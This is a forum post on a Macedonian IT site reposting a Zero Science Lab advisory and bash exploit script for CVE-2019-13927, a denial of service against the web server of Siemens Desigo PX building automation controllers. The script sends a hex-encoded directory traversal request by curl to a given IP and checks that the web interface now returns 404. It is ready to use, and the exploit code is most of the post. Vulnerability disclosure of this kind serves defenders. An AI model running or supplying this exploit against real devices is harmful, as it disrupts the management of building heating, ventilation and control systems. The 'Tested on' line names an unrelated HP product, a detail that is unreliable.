1. Здраво и добредојдовте на форумот на IT.mk.

    Доколку сеуште не сте дел од најголемата заедница на ИТ професионалци и ентузијасти во Македонија, можете бесплатно да се - процесот нема да ви одземе повеќе од 2-3 минути, а за полесна регистрација овозможивме и регистрирање со Facebook и Steam.
    Сокриј

Siemens Desigo PX V6.00 Web Remote Denial of Service Exploit

Дискусија во форумот 'Ранливости // Експлоити // Закрпи' започната од zeroscience, 13 ноември 2019.

  1. zeroscience

    zeroscience
    ZSL Bot v4.89.1.00

    616
    513
    31 Мај 2010
    Код:
    #!/bin/bash
    #
    #
    # Siemens Desigo PX V6.00 Web Remote Denial of Service Exploit
    #
    #
    # Vendor: Siemens AG
    # Vendor web page: https://www.siemens.com
    # Product web page: https://new.siemens.com/global/en/products/buildings/automation/desigo.html
    # Affected version: Model: PXC00-E.D, PXC50-E.D, PXC100-E.D, PXC200-E.D
    #                   With Desigo PX Web modules: PXA40-W0, PXA40-W1, PXA40-W2
    #                   All firmware versions < V6.00.320
    #                   ------
    #                   Model: PXC00-U, PXC64-U, PXC128-U
    #                   With Desigo PX Web modules: PXA30-W0, PXA30-W1, PXA30-W2
    #                   All firmware versions < V6.00.320
    #                   ------
    #                   Model: PXC22.1-E.D, PXC36-E.D, PXC36.1-E.D
    #                   With activated web server
    #                   All firmware versions < V6.00.320
    #
    # Summary: Desigo PX is a modern building automation and control
    # system for the entire field of building service plants. Scalable
    # from small to large projects with highest degree of energy efficiency,
    # openness and user-friendly operation.
    #
    # Desc: The device contains a vulnerability that could allow an attacker
    # to cause a denial of service condition on the device's web server
    # by sending a specially crafted HTTP message to the web server port
    # (tcp/80). The security vulnerability could be exploited by an attacker
    # with network access to an affected device. Successful exploitation
    # requires no system privileges and no user interaction. An attacker
    # could use the vulnerability to compromise the availability of the
    # device's web service. While the device itself stays operational, the
    # web server responds with HTTP status code 404 (Not found) to any further
    # request. A reboot is required to recover the web interface.
    #
    # Tested on: HP StorageWorks MSL4048 httpd
    #
    # ================================================================================
    # Expected result after sending the directory traversal sequence: /dir?dir=../../:
    # --------------------------------------------------------------------------------
    #
    # $ curl http://10.0.0.17/index.htm
    # <HEAD><TITLE>404 Not Found</TITLE></HEAD>
    # <BODY><H1>404 Not Found</H1>
    # Url '/INDEX.HTM' not found on server<P>
    # </BODY>
    #
    # ================================================================================
    #
    #
    # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
    # Zero Science Lab - https://www.zeroscience.mk
    # @zeroscience
    #
    #
    # Advisory ID: ZSL-2019-5542
    # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5542.php
    #
    # Vendor ID: SSA-898181
    # Vendor Fix: https://support.industry.siemens.com/cs/document/109772802
    # Vendor Advisory PDF: https://cert-portal.siemens.com/productcert/pdf/ssa-898181.pdf
    # Vendor Advisory TXT: https://cert-portal.siemens.com/productcert/txt/ssa-898181.txt
    # Vendor ACK: https://new.siemens.com/global/en/products/services/cert/hall-of-thanks.html
    #
    # CWE ID: CWE-472: External Control of Assumed-Immutable Web Parameter
    # CWE URL: https://cwe.mitre.org/data/definitions/472.html
    # CVE ID: CVE-2019-13927
    # CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13927
    # CVSS v3.1 Base Score: 5.3
    # CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:H/RL:O/RC:C
    #
    #
    # 06.06.2019
    #
    
    
    echo -ne "\n----------------------------------"
    echo -ne "\nSiemens Desigo PX HTTP Web RMI DoS"
    echo -ne "\n----------------------------------\n"
    if [ "$#" -ne 1 ]; then
        echo -ne "\nUsage: $0 [ipaddr]\n\n"
        exit
    fi
    IP=$1
    TARGET="http://$IP/"
    PAYLOAD=`echo -ne "\x64\x69\x72\x3f\x64\x69\x72\x3d\x2e\x2e\x2f\x2e\x2e\x2f"`
    echo -ne "\n[+] Sending payload to $IP on port 80."
    curl -s "$TARGET$PAYLOAD" > /dev/null
    echo -ne "\n[*] Done"
    echo -ne "\n[+] Checking if exploit was successful..."
    status=$(curl -Is http://$IP/index.htm 2>/dev/null | head -1 | awk -F" " '{print $2}')
    if [ "$status" == "404" ]; then
        echo -ne "\n[*] Exploit successful!\n"
    else
        echo -ne "\n[-] Exploit unsuccessful.\n"
        exit
    fi
    

    Zero Science Lab » Siemens Desigo PX V6.00 Web Remote Denial of Service Exploit
     

Сподели

Вчитување...